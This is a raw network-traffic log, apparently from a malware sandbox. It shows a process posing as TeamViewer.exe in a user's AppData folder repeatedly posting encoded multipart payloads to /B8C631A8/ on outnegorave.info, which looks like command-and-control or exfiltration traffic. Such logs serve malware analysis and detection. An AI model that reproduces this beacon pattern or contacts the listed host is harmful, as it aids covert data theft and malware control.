2021-09-15 11:52:22 UTC | 1688 | OUT | Data Ascii: ----------2639774921--
2021-09-15 11:52:23 UTC | 1688 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:23 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ee278f8e9c6333688ea0aab06f7a473cb11852bdefce738d80c4452aa3a96a82; expires=Thu, 15-Sep-2022 11:52:22 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F2oZoc%2BZubre%2FOTjpyPri%2FXnzqwlntURsOEpt8RvVjIInl%2FdAXZTTPAokYXc78vX4Br32mqjVXLCV5b8ufVcKS59J7pETt7ijBH2OuF54ejr7Ek5NfhnnyLKJ8BQnpGxxhN8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a603ef076940-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:23 UTC | 1689 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49759 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:51:42 UTC | 170 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 88912
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------142932537
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:51:42 UTC | 170 | OUT | Data Ascii:
----------142932537
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:51:42 UTC | 257 | OUT | Data Ascii: ----------142932537--
2021-09-15 11:51:55 UTC | 257 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:55 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3cec0ed4240dd48cf763b5fd88d8539b6fa5763293551ee46a1b0cca365efb17; expires=Thu, 15-Sep-2022 11:51:42 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qVy0W0xqCeHtRgT9OBrUgIjRVAgozp1JdX4n9u2yJ0uEbQUWFKuNZkL9wu7g739XJ5VtW3lSwbTr6Fy9%2FHlw8%2BYylqDplqTdP%2BseLAT1I2hvt7Wc1Zoq7Hd3cPk7hQ5teB26"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a50bb9836943-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:51:55 UTC | 258 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.5 | 49811 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:23 UTC | 1689 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84974
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------428629968
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:23 UTC | 1689 | OUT | Data Ascii:
----------428629968
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:23 UTC | 1772 | OUT | Data Ascii: ----------428629968--
2021-09-15 11:52:24 UTC | 1772 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:24 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=f783497303501e397cd1b19a1edc3350fd11bc1acc137b9e39add4fd23c198c5; expires=Thu, 15-Sep-2022 11:52:23 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r9A7csYAhhC74oY4vXRSC7H2c4SGWRiSg5WM36RwhJbFM1V05f2VffwFRWbiXp1nzvbhFy5f0IRuNkeriFDYFRwY7AKYSaL2J8Tg%2BGIE3P232xCL%2F7OJnyEY0Q8%2BRmiId4C7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a60b88f80eaf-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.5 | 49812 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:24 UTC | 1773 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84984
Content-Type: multipart/form-data; boundary=--------1864185560
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:24 UTC | 1773 | OUT | Data Ascii:
----------1864185560
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:24 UTC | 1856 | OUT | Data Ascii: ----------1864185560--
2021-09-15 11:52:25 UTC | 1856 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:25 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=db21aa9251e613e9d7c0dcc96f0a9f3b709a40cd7bb6f9550393d411ba62b7d9; expires=Thu, 15-Sep-2022 11:52:24 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8m90%2FstnGYYmQS2lGhQgrvUVgeOzyfv2jOfQYjupkCqGTm%2Ftc7amCWq4774QWI0nweGW9m9byboGMM5V36gRRPkN8uaLBIUcRtn1AnSD%2FX0oS0vhqLLb7W9U6r0bNRTKY%2B7a"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a6131b9b9814-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.5 | 49813 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:26 UTC | 1857 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84991
Content-Type: multipart/form-data; boundary=--------1379028263
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:26 UTC | 1858 | OUT | Data Ascii:
----------1379028263
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:26 UTC | 1941 | OUT | Data Ascii: ----------1379028263--
2021-09-15 11:52:26 UTC | 1941 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:26 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=5fa936f79854eb4b4dc2fe69418dee6c2d24a8cd9dfc26c22f7f77911b5ce4dc; expires=Thu, 15-Sep-2022 11:52:26 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wIhA98pGY%2Fh1W3NZXjCe6ghe0eG%2Bt3jbIc8pNoZnRgCwFJb0OvYkqCi6sfFQsBRe6kVnjU2qaA5NSSX7XPQwOQvpzOodkNnLJAU0sF3HiVNzg12LR49Mk5c2QNnYam%2F09TEf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a61c6b224eda-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.5 | 49814 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:27 UTC | 1942 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84962
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2355185848
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:27 UTC | 1942 | OUT | Data Ascii:
----------2355185848
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:27 UTC | 2025 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:27 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=94614511adbcc668b855c90be9b30e242ab8db0736c232d7022d84312ea1f682; expires=Thu, 15-Sep-2022 11:52:27 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NPIqWwt%2FK%2FNX7EfNK2XDFttuYMlpJi8CGIHoXWlsBZEIODuSpcItLspxkcd1yRH2JZ5eC0tnFASGF%2BtameOObz90tL%2FjmeKld8HvFNuMBkXdGEadTXBxODM8dKryWAZrhHIV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a622acf24e7f-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.5 | 49815 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:28 UTC | 2026 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85028
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1302388111
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:28 UTC | 2026 | OUT | Data Ascii:
----------1302388111
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:29 UTC | 2109 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:29 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=d56e7f77bc56cb3564f8d01640fe90a155ca970651939e9166f317e65bfc6cb3; expires=Thu, 15-Sep-2022 11:52:28 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J4XqNdjqm5DpUU42drANLX%2BfTXlfoCZD7Ghy7ZZV5FkgXWYitsRfMcgA5pth2%2BKbj%2FgjmG7gBB5llrbSqsgnNaxl0Kuwy616x753xPxM8ulEHltvMWtws%2Fwq%2F6Slj0vxJD6X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a62949231f55-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.5 | 49816 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:30 UTC | 2110 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1638634252
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:30 UTC | 2110 | OUT | Data Ascii:
----------1638634252
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:30 UTC2158OUTData Raw: d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29 68 00 a5 a4 a5 a0 05 a5 a6 d3 a8 13 0a 51 49 4b 40 85 a2 92 96 81 05 2d 14 53 00 a5 14 52 8a 04 c5 a0 52 52 8a 04 68 69 23 f7 ee 7d 10 d5 63 d4 fd 6a d6 93 fe ba 4f f7 4d 55 3d 4f d6 b2
                                                                                                                                    Data Ascii: SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRhi#}cjOMU=O
                                                                                                                                    2021-09-15 11:52:30 UTC2174OUTData Raw: a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45 14 08 5a 28 a4 a0 02 8a 28 a0 02 96 92 96 80 0a 28 a2 81 05 14 51 4c
                                                                                                                                    Data Ascii: JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QEZ(((QL
                                                                                                                                    2021-09-15 11:52:30 UTC2190OUTData Raw: a8 d8 6e 9b 4a 63 7d 00 e7 60 18 95 47 d3 f8 bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc b9 c7 ae d1 9f d6 b1 6b 6a 72 e7 82 97 74 71 49 59 b4 14 51 4b 56 20
                                                                                                                                    Data Ascii: nJc}`G}3k2#nSGp <hVx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+kjrtqIYQKV
                                                                                                                                    2021-09-15 11:52:30 UTC2193OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 36 33 38 36 33 34 32 35 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1638634252--
2021-09-15 11:52:32 UTC | 2193 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:32 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=9ab49e1f20c2ae65824cd9cd72958965646baa096a4e8ce83901ea3ccdde258c; expires=Thu, 15-Sep-2022 11:52:30 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y%2FaLdp4MNF%2F1gizHW%2FM2NzUxRzGHcOolAXjTNlxV0i0yJJWhaaF4KK5ZNF3UvePvLtThAzrKAsq5TveIW3NxrTJ3Pj8MYVh2FxemUty4nj8rADquMqMwz01RX6cOh8rIvUzf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6351a874ecd-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:32 UTC | 2194 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.5 | 49817 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:32 UTC | 2194 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85242
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3575858873
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:33 UTC | 2278 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:33 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=d3aca64313757306a4bdcbb850070bfc082cb726b0335d966c2ed80b99366ddf; expires=Thu, 15-Sep-2022 11:52:32 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7qEocDOA2PzX1s8MVKExEQ96YUIvX4niB2OGKgoiiE59bIIV4rd35kQQ9PNtMxHR%2BWrV3m71K%2FsFo9i2OOwjK41Y5VI5z16WzrG24ApEsccreBXYftwCq2AcoR9RyU6YnTgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6447b574a8b-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:33 UTC | 2278 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.5 | 49818 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:33 UTC | 2278 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84965
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------285568995
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                     2021-09-15 11:52:34 UTC | 2362 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:34 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=27078f6c1fc9217215d5162b9b43baa26cbe36370b513145cdaee5004466a227; expires=Thu, 15-Sep-2022 11:52:33 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F3riMOK7e0DL1cbix8NcjFixr5%2Fbnyf76TWAfjoMlB90rSe%2BQyzhi3H%2Fdu5uy0aCUetZOF8xmfZ0tDxL8LejMmUuQoe9SUOunRhuWf55SJGtM9tV8E0kT4h4iOlz5n%2FSjdV%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a64b1faac281-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:34 UTC2363INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                     28 | 192.168.2.5 | 49819 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                     Timestamp | kBytes transferred | Direction | Data
                                                                                                                                     2021-09-15 11:52:37 UTC | 2363 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 88438
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2471988
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                     2021-09-15 11:52:37 UTC | 2363 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 34 37 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                     Data Ascii: ----------2471988
                                                                                                                                     Content-Disposition: form-data; name="k"
                                                                                                                                     Content-Type: text/plain
                                                                                                                                     Content-Transfer-Encoding: binary
                                                                                                                                     2021-09-15 11:52:38 UTC | 2449 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:38 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
